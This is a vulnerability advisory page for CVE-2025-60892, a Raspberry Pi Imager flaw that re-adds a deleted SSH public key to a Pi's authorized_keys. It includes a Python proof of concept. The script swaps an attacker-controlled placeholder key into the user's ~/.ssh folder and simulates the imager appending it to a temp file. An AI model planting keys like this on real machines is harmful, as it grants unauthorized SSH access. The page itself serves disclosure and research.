Security Vulnerability Report
CVE-2025-60892 CVSS 6.8 MEDIUM

CVE-2025-60892

Published: 2025-11-03 15:15:36
Last Modified: 2026-04-15 00:35:42

Description

An issue exists in Raspberry Pi Imager version 1.9.6 for Windows, affecting its OS customization feature. The imager's 'public-key authentication' setting unintentionally re-adds a user's id_rsa.pub key from their local Windows machine to the authorized_keys file on the Raspberry Pi, even after the user explicitly deletes the key from the user interface. This creates an unintended attack surface, as it could allow an attacker to use a different key than the intended one to log in to the device.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Raspberry Pi Imager < 1.9.6 (possibly affected)
Raspberry Pi Imager = 1.9.6 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-60892 PoC - Raspberry Pi Imager Key Re-addition Attack
# This PoC demonstrates the vulnerability where Raspberry Pi Imager
# re-adds deleted SSH public keys during OS customization
import tempfile
from pathlib import Path

USER_SSH_DIR = Path.home() / '.ssh'
LOCAL_KEY_PATH = USER_SSH_DIR / 'id_rsa.pub'
# Copy of any pre-existing id_rsa.pub, restored by cleanup()
BACKUP_KEY_PATH = USER_SSH_DIR / 'id_rsa.pub.poc-backup'


def setup_malicious_key():
    """
    Setup phase: Place a malicious SSH public key in user's .ssh directory
    This simulates an attacker with local access to the Windows system
    """
    USER_SSH_DIR.mkdir(exist_ok=True)

    # Keep the user's real public key so the PoC does not destroy it
    if LOCAL_KEY_PATH.exists():
        LOCAL_KEY_PATH.replace(BACKUP_KEY_PATH)

    # Malicious public key (attacker controls the corresponding private key)
    malicious_pub_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7...attacker_key"

    with open(LOCAL_KEY_PATH, 'w') as f:
        f.write(malicious_pub_key)

    print(f"[+] Placed malicious key in {LOCAL_KEY_PATH}")


def simulate_imager_behavior():
    """
    Simulates Raspberry Pi Imager's vulnerable behavior:
    Re-reading and re-adding the public key even after user deletion
    """
    # Simulated target; the temp directory exists on Windows as well as Linux
    authorized_keys_path = Path(tempfile.gettempdir()) / 'pi_authorized_keys'

    # Simulate user deleting the key from imager UI
    print("[*] User deletes the SSH key from Raspberry Pi Imager UI...")

    # Simulate imager reading local id_rsa.pub
    if LOCAL_KEY_PATH.exists():
        with open(LOCAL_KEY_PATH, 'r') as f:
            key_content = f.read()

        # VULNERABILITY: Imager re-adds the key despite user deletion
        print("[!] VULNERABILITY: Raspberry Pi Imager re-adds the key!")
        print(f"[*] Writing key to {authorized_keys_path}")

        with open(authorized_keys_path, 'a') as f:
            f.write(key_content + '\n')

        print("[+] Malicious key has been re-added to authorized_keys")
        print("[*] Attacker can now use their private key to access the Raspberry Pi")


def cleanup():
    """Cleanup test artifacts"""
    if LOCAL_KEY_PATH.exists():
        LOCAL_KEY_PATH.unlink()
    # Put back the public key that was present before the PoC ran
    if BACKUP_KEY_PATH.exists():
        BACKUP_KEY_PATH.replace(LOCAL_KEY_PATH)
    print("[*] Cleaned up test key")


if __name__ == '__main__':
    print("=== CVE-2025-60892 PoC ===")
    print("Raspberry Pi Imager Public Key Re-addition Vulnerability\n")

    setup_malicious_key()
    simulate_imager_behavior()
    cleanup()

    print("\n[!] Note: This PoC demonstrates the vulnerability concept.")
    print("[!] Real attack requires:")
    print("    1. Local access to Windows system")
    print("    2. User using Raspberry Pi Imager 1.9.6")
    print("    3. Attacker possesses corresponding private key")
```

References

https://github.com/raspberrypi/rpi-imager/issues/1185

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60892", "sourceIdentifier": "[email protected]", "published": "2025-11-03T15:15:36.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Raspberry Pi Imager version 1.9.6 for Windows, affecting its OS customization feature. The imager's 'public-key authentication' setting unintentionally re-adds a user's id_rsa.pub key from their local Windows machine to the authorized_keys file on the Raspberry Pi, even after the user explicitly deletes the key from the user interface. This creates an unintended attack surface, as it could allow an attacker to use a different key than the intended one to login to the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/raspberrypi/rpi-imager/issues/1185", "source": "[email protected]"}]}}